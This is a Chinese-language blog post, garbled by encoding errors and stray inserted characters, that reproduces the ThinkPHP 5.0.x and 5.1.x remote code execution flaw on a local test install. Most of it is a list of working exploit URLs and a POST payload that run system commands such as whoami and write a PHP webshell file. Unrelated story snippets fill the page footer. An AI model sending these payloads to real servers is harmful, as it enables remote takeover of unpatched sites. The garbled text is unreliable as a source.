ThinkPhp5.0.x遠(yuǎn)程RCE復(fù)現(xiàn)

0x1 前言
之前看到大佬們在網(wǎng)上爆出tp遠(yuǎn)程代碼執(zhí)行谱煤,我就想著來復(fù)現(xiàn)一波例衍,所以寫篇文章做個筆記。

0x2漏洞復(fù)現(xiàn)
首先去ThinkPhP官網(wǎng)下載他的一個框架:http://www.thinkphp.cn/down.html

11.png

在這里我選擇的是ThinkPHP5.0.22完整版,大家可以下載其他版本喧锦!

然后使用phpstudy集成環(huán)境搭建Tp5.0.22:

1.png

然后運(yùn)行php環(huán)境昨忆,在這里我選擇的是Apach+PHP5.5n的:
2.png

然后訪問:http://127.0.0.1/cms/public/index.php
3.png

然后在url后面添加:

添加后:http://127.0.0.1/cms/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

打開網(wǎng)頁看看執(zhí)行結(jié)果:


22.png

Success丁频!當(dāng)然這是GET請求的攻擊,我們?nèi)绾斡肞OST請求來執(zhí)行命令呢邑贴?

這時候需要用到火狐瀏覽器的Hackbar:

URL:http://127.0.0.1/cms/public/index.php?s=captcha
Post data:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

然后Excute:


4.png

然后成功執(zhí)行了官撼!ok傀广,筆記就到這拇泣!

下面附上其他payload:

TP版本5.0.21:
http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


TP版本5.0.22:
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


TP5.1.*
thinkphp5.1.29為例

1定铜、代碼執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1

2、命令執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=操作系統(tǒng)命令

3独旷、文件寫入(寫shell):
http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

4署穗、未知:
http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E

5寥裂、代碼執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

6、命令執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系統(tǒng)命令

7案疲、代碼執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

8封恰、命令執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系統(tǒng)命令

Power_Liu
Qq:211124332
歡迎大佬找我交流技術(shù)

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市褐啡,隨后出現(xiàn)的幾起案子诺舔,更是在濱河造成了極大的恐慌,老刑警劉巖备畦,帶你破解...
    沈念sama閱讀 217,277評論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件低飒,死亡現(xiàn)場離奇詭異,居然都是意外死亡懂盐,警方通過查閱死者的電腦和手機(jī)褥赊,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,689評論 3 393
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來莉恼,“玉大人拌喉,你說我怎么就攤上這事±” “怎么了尿背?”我有些...
    開封第一講書人閱讀 163,624評論 0 353
  • 文/不壞的土叔 我叫張陵,是天一觀的道長捶惜。 經(jīng)常有香客問我田藐,道長,這世上最難降的妖魔是什么吱七? 我笑而不...
    開封第一講書人閱讀 58,356評論 1 293
  • 正文 為了忘掉前任汽久,我火速辦了婚禮,結(jié)果婚禮上踊餐,老公的妹妹穿的比我還像新娘回窘。我一直安慰自己,他們只是感情好市袖,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,402評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著烁涌,像睡著了一般苍碟。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上撮执,一...
    開封第一講書人閱讀 51,292評論 1 301
  • 那天微峰,我揣著相機(jī)與錄音,去河邊找鬼抒钱。 笑死蜓肆,一個胖子當(dāng)著我的面吹牛颜凯,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播仗扬,決...
    沈念sama閱讀 40,135評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼症概,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了早芭?” 一聲冷哼從身側(cè)響起彼城,我...
    開封第一講書人閱讀 38,992評論 0 275
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎退个,沒想到半個月后募壕,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,429評論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡语盈,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,636評論 3 334
  • 正文 我和宋清朗相戀三年舱馅,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片刀荒。...
    茶點(diǎn)故事閱讀 39,785評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡代嗤,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出照棋,到底是詐尸還是另有隱情资溃,我是刑警寧澤,帶...
    沈念sama閱讀 35,492評論 5 345
  • 正文 年R本政府宣布烈炭,位于F島的核電站溶锭,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏符隙。R本人自食惡果不足惜趴捅,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,092評論 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望霹疫。 院中可真熱鬧拱绑,春花似錦、人聲如沸丽蝎。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,723評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽屠阻。三九已至红省,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間国觉,已是汗流浹背吧恃。 一陣腳步聲響...
    開封第一講書人閱讀 32,858評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留麻诀,地道東北人痕寓。 一個月前我還...
    沈念sama閱讀 47,891評論 2 370
  • 正文 我出身青樓傲醉,卻偏偏與公主長得像,于是被迫代替她去往敵國和親呻率。 傳聞我的和親對象是個殘疾皇子硬毕,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,713評論 2 354

推薦閱讀更多精彩內(nèi)容

  • 理工寢室商店-微信小程序 疑問小結(jié) 當(dāng)時在XAMMP下mysql目錄下的bin下 php -v 不起作用.到ph...
    這個超人不會飛阿閱讀 1,704評論 1 1
  • 1. 一、框架概述 2. 課程概述 laravel 4天(之前TP框架還是很大的區(qū)別)(國外框架) 在線教育平臺 ...
    jim1999閱讀 327評論 0 0
  • 最近筷凤,我被身邊這位正能量的小姐姐嚴(yán)重感染了昭殉! 打開記憶的閘門,發(fā)現(xiàn)她的人生藐守, 不斷地在接受挪丢、適應(yīng)、擁抱卢厂、戰(zhàn)勝各種各...
    安好Birdie閱讀 337評論 0 0
  • 那我們首先先來了解一下乾蓬。宮寒是什么,是什么原因?qū)е碌膶m寒慎恒,我相信大家可能跟我一樣之前一樣都是一個比較模糊的一個概念...
    a702672b7f13閱讀 454評論 0 1
  • 異鄉(xiāng),工作粒氧,睡覺越除,還款,睡覺外盯,工作摘盆,等廣告短信塞滿電話,停機(jī)了饱苟?那是提醒我月租扣完了孩擂。 免不得覺得這日子就是溫水煮...
    半夏三生閱讀 185評論 0 0